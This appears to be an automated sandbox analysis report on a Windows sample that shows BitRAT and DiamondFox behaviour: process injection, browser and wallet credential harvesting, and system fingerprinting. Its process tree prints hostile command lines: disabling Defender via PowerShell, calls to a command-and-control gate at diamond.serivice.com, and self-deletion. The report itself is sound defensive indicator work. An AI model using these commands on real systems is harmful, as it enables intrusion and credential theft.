Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
03-07-2021 23:55
Static task
static1
Behavioral task
behavioral1
Sample
mixazed_20210703-205320.exe
Resource
win7v20210410
General
-
Target
mixazed_20210703-205320.exe
-
Size
1.8MB
-
MD5
8703d31eadccffa270ba764a35dfd548
-
SHA1
6dd74fef8122095da64955abd99f38421629445d
-
SHA256
3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
-
SHA512
f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2
Malware Config
Signatures
-
BitRAT Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/772-71-0x00000000007E2730-mapping.dmp family_bitrat -
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 19 IoCs
Detects DiamondFox payload in file/memory.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe diamondfox \Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe diamondfox \Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe diamondfox \Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe diamondfox C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe diamondfox C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp MailPassView behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 9 IoCs
Processes:
resource yara_rule behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp Nirsoft behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/472-169-0x0000000000413E10-mapping.dmp Nirsoft behavioral1/memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp Nirsoft behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
sVQTwb6rts5kF2Qe.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 828 sVQTwb6rts5kF2Qe.exe 844 MicrosoftEdgeCPS.exe 1132 MicrosoftEdgeCPS.exe 1276 MicrosoftEdgeCPS.exe 472 MicrosoftEdgeCPS.exe 1684 MicrosoftEdgeCPS.exe 1988 MicrosoftEdgeCPS.exe 1804 MicrosoftEdgeCPS.exe 1948 MicrosoftEdgeCPS.exe 1316 MicrosoftEdgeCPS.exe -
Processes:
resource yara_rule behavioral1/memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Loads dropped DLL 7 IoCs
Processes:
mixazed_20210703-205320.exesVQTwb6rts5kF2Qe.exeMicrosoftEdgeCPS.exepid process 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 828 sVQTwb6rts5kF2Qe.exe 828 sVQTwb6rts5kF2Qe.exe 844 MicrosoftEdgeCPS.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
mixazed_20210703-205320.exepid process 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
mixazed_20210703-205320.exeMicrosoftEdgeCPS.exedescription pid process target process PID 2004 set thread context of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 844 set thread context of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 1276 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 472 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 1684 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 1988 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 1804 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 1948 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 set thread context of 1316 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 828 taskkill.exe 1640 taskkill.exe 1360 taskkill.exe 1160 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1716 notepad.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
mixazed_20210703-205320.exepowershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 2004 mixazed_20210703-205320.exe 2004 mixazed_20210703-205320.exe 1588 powershell.exe 1188 powershell.exe 1188 powershell.exe 1588 powershell.exe 844 MicrosoftEdgeCPS.exe 1132 MicrosoftEdgeCPS.exe 1132 MicrosoftEdgeCPS.exe 844 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
mixazed_20210703-205320.exemixazed_20210703-205320.exepowershell.exepowershell.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 2004 mixazed_20210703-205320.exe Token: SeDebugPrivilege 772 mixazed_20210703-205320.exe Token: SeShutdownPrivilege 772 mixazed_20210703-205320.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeIncreaseQuotaPrivilege 332 wmic.exe Token: SeSecurityPrivilege 332 wmic.exe Token: SeTakeOwnershipPrivilege 332 wmic.exe Token: SeLoadDriverPrivilege 332 wmic.exe Token: SeSystemProfilePrivilege 332 wmic.exe Token: SeSystemtimePrivilege 332 wmic.exe Token: SeProfSingleProcessPrivilege 332 wmic.exe Token: SeIncBasePriorityPrivilege 332 wmic.exe Token: SeCreatePagefilePrivilege 332 wmic.exe Token: SeBackupPrivilege 332 wmic.exe Token: SeRestorePrivilege 332 wmic.exe Token: SeShutdownPrivilege 332 wmic.exe Token: SeDebugPrivilege 332 wmic.exe Token: SeSystemEnvironmentPrivilege 332 wmic.exe Token: SeRemoteShutdownPrivilege 332 wmic.exe Token: SeUndockPrivilege 332 wmic.exe Token: SeManageVolumePrivilege 332 wmic.exe Token: 33 332 wmic.exe Token: 34 332 wmic.exe Token: 35 332 wmic.exe Token: SeIncreaseQuotaPrivilege 332 wmic.exe Token: SeSecurityPrivilege 332 wmic.exe Token: SeTakeOwnershipPrivilege 332 wmic.exe Token: SeLoadDriverPrivilege 332 wmic.exe Token: SeSystemProfilePrivilege 332 wmic.exe Token: SeSystemtimePrivilege 332 wmic.exe Token: SeProfSingleProcessPrivilege 332 wmic.exe Token: SeIncBasePriorityPrivilege 332 wmic.exe Token: SeCreatePagefilePrivilege 332 wmic.exe Token: SeBackupPrivilege 332 wmic.exe Token: SeRestorePrivilege 332 wmic.exe Token: SeShutdownPrivilege 332 wmic.exe Token: SeDebugPrivilege 332 wmic.exe Token: SeSystemEnvironmentPrivilege 332 wmic.exe Token: SeRemoteShutdownPrivilege 332 wmic.exe Token: SeUndockPrivilege 332 wmic.exe Token: SeManageVolumePrivilege 332 wmic.exe Token: 33 332 wmic.exe Token: 34 332 wmic.exe Token: 35 332 wmic.exe Token: SeIncreaseQuotaPrivilege 1148 wmic.exe Token: SeSecurityPrivilege 1148 wmic.exe Token: SeTakeOwnershipPrivilege 1148 wmic.exe Token: SeLoadDriverPrivilege 1148 wmic.exe Token: SeSystemProfilePrivilege 1148 wmic.exe Token: SeSystemtimePrivilege 1148 wmic.exe Token: SeProfSingleProcessPrivilege 1148 wmic.exe Token: SeIncBasePriorityPrivilege 1148 wmic.exe Token: SeCreatePagefilePrivilege 1148 wmic.exe Token: SeBackupPrivilege 1148 wmic.exe Token: SeRestorePrivilege 1148 wmic.exe Token: SeShutdownPrivilege 1148 wmic.exe Token: SeDebugPrivilege 1148 wmic.exe Token: SeSystemEnvironmentPrivilege 1148 wmic.exe Token: SeRemoteShutdownPrivilege 1148 wmic.exe Token: SeUndockPrivilege 1148 wmic.exe Token: SeManageVolumePrivilege 1148 wmic.exe Token: 33 1148 wmic.exe Token: 34 1148 wmic.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
mixazed_20210703-205320.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 1276 MicrosoftEdgeCPS.exe 1804 MicrosoftEdgeCPS.exe 1948 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mixazed_20210703-205320.exemixazed_20210703-205320.exesVQTwb6rts5kF2Qe.exeMicrosoftEdgeCPS.exedescription pid process target process PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe mixazed_20210703-205320.exe PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe sVQTwb6rts5kF2Qe.exe PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe sVQTwb6rts5kF2Qe.exe PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe sVQTwb6rts5kF2Qe.exe PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe sVQTwb6rts5kF2Qe.exe PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe MicrosoftEdgeCPS.exe PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe MicrosoftEdgeCPS.exe PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe MicrosoftEdgeCPS.exe PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe MicrosoftEdgeCPS.exe PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe powershell.exe PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe powershell.exe PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe powershell.exe PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe powershell.exe PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe powershell.exe PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe powershell.exe PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe powershell.exe PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe powershell.exe PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe wmic.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1276 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 844 wrote to memory of 1276 844 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe"C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1988 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1804 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1316 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1948 /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe' -Force -Recurse4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248baMD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370MD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295bMD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eebMD5
597009ea0430a463753e0f5b1d1a249e
SHA14e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62
SHA2563fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d
SHA5125d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4cMD5
a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
f93980e0b7767e289bbf2dac2c07dbfa
SHA11d375f68635abe3e0b88ee39f904ec18d7a96ca0
SHA2569f4395cd8b9484aa98b6e36e839a0d4a11e9159c8e6329ddf0a6af4d1eb34eb4
SHA51273046bb29bb42cd5d34dbcbddfbdb893c236f067cf854c0da2e05e1218cbe7739c7d10a76a31fbd887a91ce4053df2e5733875c6bac63b0c8adc6c5e5bf95a9b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
b0c4db2e327b48808dc40d7f52492ac4
SHA19cee67c4749f2f8c84ae1686c486114bf7865035
SHA256e62c6dc6d4701aa4cdb32ff5fc4a998e46cd93e2f7d62eff53d70c660e7ea09b
SHA5126092052c1d7dae4668cc9e58dfef31ef287cea05c4708a34b7f292495e4f27937dfd69aa3b819b0c5e40f9b3fb20b414dd80c4caee5f5fc34218f3416f26312e
-
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exeMD5
a1e165e1926c0c83123c89fce6b1af56
